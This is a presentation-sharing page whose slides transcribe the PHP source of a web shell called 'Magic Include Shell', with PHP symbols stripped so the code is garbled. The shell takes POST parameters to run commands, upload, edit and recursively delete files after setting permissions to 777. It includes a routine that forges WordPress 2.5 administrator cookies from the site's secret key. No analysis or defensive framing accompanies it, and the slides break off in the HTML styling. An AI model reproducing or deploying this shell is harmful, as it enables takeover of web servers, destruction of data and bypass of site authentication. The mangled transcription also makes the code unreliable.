<?php - PowerPoint PPT Presentation

About This Presentation
Title:

<?php

Description:

php – PowerPoint PPT presentation

Number of Views:32
Avg rating:3.0/5.0
Slides: 430
Provided by: Serv722
Learn more at: http://cups.cs.cmu.edu
Category:
Tags: icq

less

Transcript and Presenter's Notes

Title: <?php


1
lt?php
2
/Magic Include Shell by Mag icq 884888/
3
/From Russia With Love/
4
ver'2.2'
5
if(isset(_GETstulcheg))
6

7
class zipfile
8

9
var datasec array()
10
var ctrl_dir array()
11
var eof_ctrl_dir "\x50\x4b\x05\x06\x00\x00\
x00\x00"
12
var old_offset 0
13
function unix2DosTime(unixtime 0)
14
timearray (unixtime 0) ? getdate()
getdate(unixtime)
15
if (timearray'year' lt 1980)
16
timearray'year' 1980
17
timearray'mon' 1
18
timearray'mday' 1
19
timearray'hours' 0
20
timearray'minutes' 0
21
timearray'seconds' 0
22

23
return ((timearray'year' - 1980) ltlt
25) (timearray'mon' ltlt 21)
(timearray'mday' ltlt 16)
24
(timearray'hours' ltlt 11)
(timearray'minutes' ltlt 5) (timearray'second
s' gtgt 1)
25

26
function addDir(name)
27

28
name str_replace("\\", "/", name)
29
fr "\x50\x4b\x03\x04"
30
fr . "\x0a\x00"
31
fr . "\x00\x00"
32
fr . "\x00\x00"
33
fr . "\x00\x00\x00\x00"
34
fr . pack("V",0)
35
fr . pack("V",0)
36
fr . pack("V",0)
37
fr . pack("v", strlen(name) )
38
fr . pack("v", 0 )
39
fr . name
40
fr . pack("V",crc)
41
fr . pack("V",c_len)
42
fr . pack("V",unc_len)
43
this -gt datasec fr
44
new_offset strlen(implode("",
this-gtdatasec))
45
cdrec "\x50\x4b\x01\x02"
46
cdrec ."\x00\x00"
47
cdrec ."\x0a\x00"
48
cdrec ."\x00\x00"
49
cdrec ."\x00\x00"
50
cdrec ."\x00\x00\x00\x00"
51
cdrec . pack("V",0)
52
cdrec . pack("V",0)
53
cdrec . pack("V",0)
54
cdrec . pack("v", strlen(name) )
55
cdrec . pack("v", 0 )
56
cdrec . pack("v", 0 )
57
cdrec . pack("v", 0 )
58
cdrec . pack("v", 0 )
59
ext "\x00\x00\x10\x00"
60
ext "\xff\xff\xff\xff"
61
cdrec . pack("V", 16 )
62
cdrec . pack("V", this -gt old_offset
)
63
this -gt old_offset new_offset
64
cdrec . name
65
this -gt ctrl_dir cdrec
66

67
function addFile(data, name, time 0)
68

69
name str_replace('\\', '/',
name)
70
name str_replace(array('../','./'),
'', name)
71
dtime dechex(this-gtunix2DosTime(ti
me))
72
hexdtime '\x' . dtime6 . dtime7
73
. '\x' . dtime4 . dtime5
74
. '\x' . dtime2 . dtime3
75
. '\x' . dtime0 . dtime1
76
eval('hexdtime "' . hexdtime . '"')
77
fr "\x50\x4b\x03\x04"
78
fr . "\x14\x00"
79
fr . "\x00\x00"
80
fr . "\x08\x00"
81
fr . hexdtime
82
unc_len strlen(data)
83
crc crc32(data)
84
zdata gzcompress(data)
85
zdata substr(substr(zdata, 0,
strlen(zdata) - 4), 2)
86
c_len strlen(zdata)
87
fr . pack('V', crc)
88
fr . pack('V', c_len)
89
fr . pack('V', unc_len)
90
fr . pack('v', strlen(name))
91
fr . pack('v', 0)
92
fr . name
93
fr . zdata
94
fr . pack('V', crc)
95
fr . pack('V', c_len)
96
fr . pack('V', unc_len)
97
this -gt datasec fr
98
cdrec "\x50\x4b\x01\x02"
99
cdrec . "\x00\x00"
100
cdrec . "\x14\x00"
101
cdrec . "\x00\x00"
102
cdrec . "\x08\x00"
103
cdrec . hexdtime
104
cdrec . pack('V', crc)
105
cdrec . pack('V', c_len)
106
cdrec . pack('V', unc_len)
107
cdrec . pack('v', strlen(name) )
108
cdrec . pack('v', 0 )
109
cdrec . pack('v', 0 )
110
cdrec . pack('v', 0 )
111
cdrec . pack('v', 0 )
112
cdrec . pack('V', 32 )
113
cdrec . pack('V', this -gt old_offset )
114
this -gt old_offset strlen(fr)
115
cdrec . name
116
this -gt ctrl_dir cdrec
117

118
function file()
119

120
data implode('', this -gt datasec)
121
ctrldir implode('', this -gt
ctrl_dir)
122
return
123
data .
124
ctrldir .
125
this -gt eof_ctrl_dir .
126
pack('v', sizeof(this -gt ctrl_dir))
.
127
pack('v', sizeof(this -gt ctrl_dir))
.
128
pack('V', strlen(ctrldir)) .
129
pack('V', strlen(data)) .
130
"\x00\x00"
131

132
function addFiles(files)
133

134
foreach(files as file)
135

136
if (is_file(file))
137

138
data implode("",file(file))
139
this-gtaddFile(data,file)
140

141

142

143
function output(file)
144

145
fpfopen(file,"w")
146
fwrite(fp,this-gtfile())
147
fclose(fp)
148

149

150
class SimpleUnzip
151
var Comment ''
152
var Entries array()
153
var Name ''
154
var Size 0
155
var Time 0
156
function SimpleUnzip(in_FileName '')
157

158
if (in_FileName ! '')
159
SimpleUnzipReadFile(in_FileName
)
160

161

162
function Count()
163

164
return count(this-gtEntries)
165

166
function GetData(in_Index)
167

168
return this-gtEntriesin_Index-gtData

169

170
function GetEntry(in_Index)
171

172
return this-gtEntriesin_Index
173

174
function GetError(in_Index)
175

176
return this-gtEntriesin_Index-gtErro
r
177

178
function GetErrorMsg(in_Index)
179

180
return this-gtEntriesin_Index-gtErro
rMsg
181

182
function GetName(in_Index)
183

184
return this-gtEntriesin_Index-gtName

185

186
function GetPath(in_Index)
187

188
return this-gtEntriesin_Index-gtPath

189

190
function GetTime(in_Index)
191

192
return this-gtEntriesin_Index-gtTime

193

194
function ReadFile(in_FileName)
195

196
this-gtEntries array()
197
this-gtName in_FileName
198
this-gtTime filemtime(in_FileName)
199
this-gtSize filesize(in_FileName)

200
oF fopen(in_FileName, 'rb')
201
vZ fread(oF, this-gtSize)
202
fclose(oF)
203
aE explode("\x50\x4b\x05\x06",
vZ)
204
aP unpack('x16/v1CL', aE1)
205
this-gtComment substr(aE1, 18,
aP'CL')
206
this-gtComment strtr(this-gtComment,
array("\r\n" gt "\n","\r" gt "\n"))
207
aE explode("\x50\x4b\x01\x02",
vZ)
208
aE explode("\x50\x4b\x03\x04",
aE0)
209
array_shift(aE)
210
foreach (aE as vZ)
211
aI array()
212
aI'E' 0
213
aI'EM' ''
214
aP unpack('v1VN/v1GPF/v1CM/v1FT
/v1FD/V1CRC/V1CS/V1UCS/v1FNL', vZ)
215
bE (aP'GPF' 0x0001) ?
TRUE FALSE
216
nF aP'FNL'
217
if (aP'GPF' 0x0008)
218
aP1 unpack('V1CRC/V1CS/V1UC
S', substr(vZ, -12))
219
aP'CRC' aP1'CRC'
220
aP'CS' aP1'CS'
221
aP'UCS' aP1'UCS'
222
vZ substr(vZ, 0, -12)
223

224
aI'N' substr(vZ, 26, nF)
225
if (substr(aI'N', -1) '/')
226
continue
227

228
aI'P' dirname(aI'N')
229
aI'P' aI'P' '.' ? ''
aI'P'
230
aI'N' basename(aI'N')
231
vZ substr(vZ, 26 nF)
232
if (strlen(vZ) ! aP'CS')
233
aI'E' 1
234
aI'EM' 'Compressed size is
not equal with the value in header information.'
235
else
236
if (bE)
237
aI'E' 5
238
aI'EM' 'File is
encrypted, which is not supported from this
class.'
239
else
240
switch(aP'CM')
241
case 0
242
break
243
case 8
244
vZ
gzinflate(vZ)
245
break
246
case 12
247
if (!
extension_loaded('bz2'))
248
if
(strtoupper(substr(PHP_OS, 0, 3)) 'WIN')
249

_at_dl('php_bz2.dll')
250
else
251

_at_dl('bz2.so')
252

253

254
if
(extension_loaded('bz2'))
255
vZ
bzdecompress(vZ)
256
else
257
aI'E' 7
258
aI'EM'
"PHP BZIP2 extension not available."
259

260
break
261
default
262
aI'E' 6
263
aI'EM'
"De-/Compression method aP'CM' is not
supported."
264

265
if (! aI'E')
266
if (vZ FALSE)
267
aI'E' 2
268
aI'EM'
'Decompression of data failed.'
269
else
270
if (strlen(vZ)
! aP'UCS')
271
aI'E' 3
272
aI'EM'
'Uncompressed size is not equal with the value in
header information.'
273
else
274
if
(crc32(vZ) ! aP'CRC')
275
aI'E'
4
276
aI'EM'
'CRC32 checksum is not equal with the value in
header information.'
277

278

279

280

281

282

283
aI'D' vZ
284
aI'T' mktime((aP'FT'
0xf800) gtgt 11,
285
(aP'FT'
0x07e0) gtgt 5,
286
(aP'FT'
0x001f) ltlt 1,
287
(aP'FD'
0x01e0) gtgt 5,
288
(aP'FD'
0x001f),
289
((aP'FD'
0xfe00) gtgt 9) 1980)
290
this-gtEntries new
SimpleUnzipEntry(aI)
291

292
return this-gtEntries
293

294

295
class SimpleUnzipEntry
296
var Data ''
297
var Error 0
298
var ErrorMsg ''
299
var Name ''
300
var Path ''
301
var Time 0
302
function SimpleUnzipEntry(in_Entry)
303

304
this-gtData in_Entry'D'
305
this-gtError in_Entry'E'
306
this-gtErrorMsg in_Entry'EM'
307
this-gtName in_Entry'N'
308
this-gtPath in_Entry'P'
309
this-gtTime in_Entry'T'
310

311

312
function unzipFile(filename, destination_folder
)

313
if (substr(destination_folder, -1) !
'/')

314
destination_folder
destination_folder .'/'

315



316
vzip new SimpleUnzip(filename)
317
foreach (vzip-gtEntries as extr)

318
path extr-gtPath
319
path_folder explode ('/', path)
320
new_path ''
321
foreach (path_folder as
folder)
322
new_path . folder .'/'

323
to_create
destination_folder . new_path

324
if (substr(to_create,
-1) '/')
325
to_create
substr(to_create, 0, strlen(to_create)-1)

326

327
_at_mkdir(to_create, 0777)

328

329
new_path ''
330
filev fopen (destination_folder.
extr-gtPath .'/'. extr-gtName, 'w')
331
fwrite (filev, extr-gtData)
332
fclose (filev)

333


334

335
function dd(file)
  • if (is_dir(file) is_file(file))

336
chmod(file,0777)
  • if (is_dir(file))

337
handle opendir(file)
338
while(filename readdir(handle))
339
if (filename ! "." filename ! "..")
  • dd(file."/".filename)

340
closedir(handle)
341
if(_at_rmdir(file))
  • print "file deleted!ltbr/gt"
  • else
  • print "file delete error!ltbr/gt"

342
  • else

343
if(_at_unlink(file))
  • print "file deleted!ltbr/gt"
  • else
  • print "file delete error!ltbr/gt"

344

345

346
function add2zipfile(file)
  • if (file_exists(file))

347
chmod(file,0777)
  • if (is_dir(file))

348
handle opendir(file)
349
while(filename readdir(handle))
350
if (filename ! "." filename ! "..")
  • archive.add2zipfile(rtrim(file,'/').'/'.filena
    me).',,'
  • //archive.rtrim(file,'/').'/'.filename.',,'

351
closedir(handle)
352
return archive
353
  • else

354
archive.file
355
return archive
356

357

358
function U_sapi()
359

360
switch(PHP_SAPI)
361

362
case 'apache2handler' return 'Apache
2.0 Handler'
363
case 'apache' return 'Apache'
364
case 'cgi' return 'CGI'
365
case 'cgi-fcgi' return
'CGI/FastCGI'
366
default return PHP_SAPI
367

368

369
function U_getos()
370

371
if (function_exists('php_uname')) return
php_uname()
372
if (PHP_OS 'WINNT')
373
return 'Windows NT'
374
return PHP_OS
375

376
sitePHP_SELF
377
if(defined('WPLANG') isset(_POSTadmin_cookies
) ereg('2\.5',wp_version))
378

379
function wp_salt()
  • global wp_default_secret_key
  • secret_key ''
  • if ( defined('SECRET_KEY') ('' ! SECRET_KEY)
    ( wp_default_secret_key ! SECRET_KEY) )
  • secret_key SECRET_KEY
  • if ( defined('SECRET_SALT') )
  • salt SECRET_SALT
  • else
  • salt get_option('secret')
  • if ( empty(salt) )
  • salt wp_generate_password()
  • update_option('secret', salt)
  • return apply_filters('salt', secret_key . salt)

380

381
function wp_hash(data)
  • salt wp_salt()
  • if ( function_exists('hash_hmac') )
  • return hash_hmac('md5', data, salt)
  • else
  • return md5(data . salt)

382

383
function wp_generate_auth_cookie(expiration)
  • key wp_hash('admin' . expiration)
  • hash hash_hmac('md5', 'admin' . expiration,
    key)
  • cookie 'admin' . '' . expiration . '' .
    hash
  • return cookie

384

385

386
header("Content-type text/html")
387
file2zip_POST'file2zip'
388
deldira_POST'deldira'
389
arhiv_POST'arhiv'
390
dira_GET'dira'
391
(empty(dira) !isset(dira)) ? dira'./' ''
392
if(!ereg("/",dira)) diradira.'/'
393
comanda_POST'comanda'
394
shcom_POST'shcom'
395
if(isset(_POST'filee') !empty(_POST'filee'
))
396
filee_POST'filee'
397
elseif(isset(_GET'filee')
!empty(_GET'filee'))
398
fileedira.''._GET'filee'
399
uploadfile_POST'uploadfile'
400
uploaddir_POST'uploaddir'
401
del_POSTdel
402
if(isset(_POST'edit') !empty(_POST'edit')
)
403
edit_POST'edit'
404
elseif(isset(_GET'edit') !empty(_GET'edit'
))
405
edit_GET'edit'
406
save_edit_POSTsave_edit
407
function cutter(str,sym,len)
408
doserr1
409
if(strpos(str,sym)!false)
410
serr0
411
str1 substr(str,0,strpos(str,sym))
412
str2 substr(str,strpos(str,sym)len,strlen(
str))
413
str str1.str2
414

415
while(serr0)
416
return str
417

418
kveryacutter(_SERVER"QUERY_STRING",'dira',99
9)
419
while(ereg('',kverya))
420

421
kveryastr_replace('','',kverya)
422

423
?gt
424
lthtmlgt
425
ltheadgt
426
lttitlegtMagic Include Shell lt?php echo ver
?gtlt/titlegt
427
ltSTYLE fprolloverstylegt
428
ACOLOR 00ff00
429
INPUT BORDER-LEFT-COLOR 000000 BACKGROUND
000000 BORDER-BOTTOM-COLOR 000000 FONT 12px
Verdana, Arial, Helvetica, sans-serif COLOR
00ff00 BORDER-TOP-COLOR 000000
BORDER-RIGHT-COLOR 000000
Write a Comment
User Comments (0)
About PowerShow.com
Home About Us Terms and Conditions Privacy Policy Presentation Removal Request Contact Us
Copyright 2024 CrystalGraphics, Inc. — All rights Reserved. PowerShow.com is a trademark of CrystalGraphics, Inc.
The PowerPoint PPT presentation: "
Do you have PowerPoint slides to share? If so, share your PPT presentation slides online with PowerShow.com. It's FREE!